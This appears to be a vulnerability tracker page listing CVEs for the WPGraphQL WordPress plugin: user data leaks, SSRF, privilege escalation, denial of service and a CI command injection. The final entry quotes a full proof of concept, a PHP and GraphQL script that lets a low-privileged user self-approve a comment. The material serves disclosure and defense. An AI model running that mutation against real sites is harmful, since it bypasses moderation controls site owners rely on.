Vulnerabilities and security researches forwp-graphql wp-graphql

Direction: ascending

Jun 06, 2024

WPGraphQL # CVE-2019-9880

CVE, Research URL: CVE-2019-9880
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: Jun 10, 2019
Research Description: An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.
Affected versions: max 0.3.0.
Status: vulnerable

WPGraphQL # CVE-2023-23684

CVE, Research URL: CVE-2023-23684
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: Nov 13, 2023
Research Description: Server-Side Request Forgery (SSRF) vulnerability in WPGraphQL.This issue affects WPGraphQL: from n/a through 1.14.5.
Affected versions: max 1.14.6.
Status: vulnerable

WPGraphQL # CVE-2019-9881

CVE, Research URL: CVE-2019-9881
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: Jun 10, 2019
Research Description: The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Affected versions: max 0.3.0.
Status: vulnerable

WPGraphQL # CVE-2019-25060

CVE, Research URL: CVE-2019-25060
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: May 09, 2022
Research Description: The WPGraphQL WordPress plugin before 0.3.5 doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.
Affected versions: max 0.3.0.
Status: vulnerable

WPGraphQL # CVE-2019-9879

CVE, Research URL: CVE-2019-9879
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: Jun 10, 2019
Research Description: The WPGraphQL 0.2.3 plugin for WordPress allows remote attackers to register a new user with admin privileges, whenever new user registrations are allowed. This is related to the registerUser mutation.
Affected versions: max 0.3.0.
Status: vulnerable

Jun 10, 2024

WPGraphQL # CVE-2021-31157

CVE, Research URL: CVE-2021-31157
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: -
Research Description: The WPGraphQL plugin for WordPress is vulnerable to Denial of Service via field duplication in versions up to, and including, 1.3.5. This makes it possible for unauthenticated attackers to rapidly duplicate fields and queries resulting in OOM and MySQL connection errors.
Affected versions: max 1.3.5.
Status: vulnerable

Apr 18, 2026

WPGraphQL # CVE-2026-27938

CVE, Research URL: CVE-2026-27938
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: Feb 26, 2026
Research Description: WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.9.1, the `wp-graphql/wp-graphql` repository contains a GitHub Actions workflow (`release.yml`) vulnerable to OS command injection through direct use of `${{ github.event.pull_request.body }}` inside a `run:` shell block. When a pull request from `develop` to `master` is merged, the PR body is injected verbatim into a shell command, allowing arbitrary command execution on the Actions runner. Version 2.9.1 contains a fix for the vulnerability.
Affected versions: max 2.9.1.
Status: vulnerable

WPGraphQL # CVE-2026-33290

CVE, Research URL: CVE-2026-33290
Home page URL: Security reports for WPGraphQL
Application: WPGraphQL
Date: Mar 24, 2026
Research Description: WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch. ### Details In WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based: - plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators. - plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability. - plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved. - plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment. - plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH). This means a non-moderator owner can submit status during update and transition moderation state. ### PoC Tested in local wp-env (Docker) with WPGraphQL 2.9.1. 1. Start environment: npm install npm run wp-env start 2. Run this PoC: ``` npm run wp-env run cli -- wp eval ' add_role("no_caps","No Caps",[]); $user_id = username_exists("poc_nocaps"); if ( ! $user_id ) { $user_id = wp_create_user("poc_nocaps","Passw0rd!","poc_nocaps@example.com"); } $user = get_user_by("id",$user_id); $user->set_role("no_caps"); $post_id = wp_insert_post([ "post_title" => "PoC post", "post_status" => "publish", "post_type" => "post", "comment_status" => "open", ]); $comment_id = wp_insert_comment([ "comment_post_ID" => $post_id, "comment_content" => "pending comment", "user_id" => $user_id, "comment_author" => $user->display_name, "comment_author_email" => $user->user_email, "comment_approved" => "0", ]); wp_set_current_user($user_id); $result = graphql([ "query" => "mutation U(\$id:ID!){ updateComment(input:{id:\$id,status:APPROVE}){ success comment{ databaseId status } } }", "variables" => [ "id" => (string)$comment_id ], ]); echo wp_json_encode([ "role_caps" => array_keys(array_filter((array)$user->allcaps)), "status" => $result["data"]["updateComment"]["comment"]["status"] ?? null, "db_comment_approved" => get_comment($comment_id)->comment_approved ?? null, "comment_id" => $comment_id ]); ' ``` 3. Observe result: - role_caps is empty (or no moderate_comments) - mutation returns status: APPROVE - DB value becomes comment_approved = 1 ### Impact This is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content.
Affected versions: max 2.10.0.
Status: vulnerable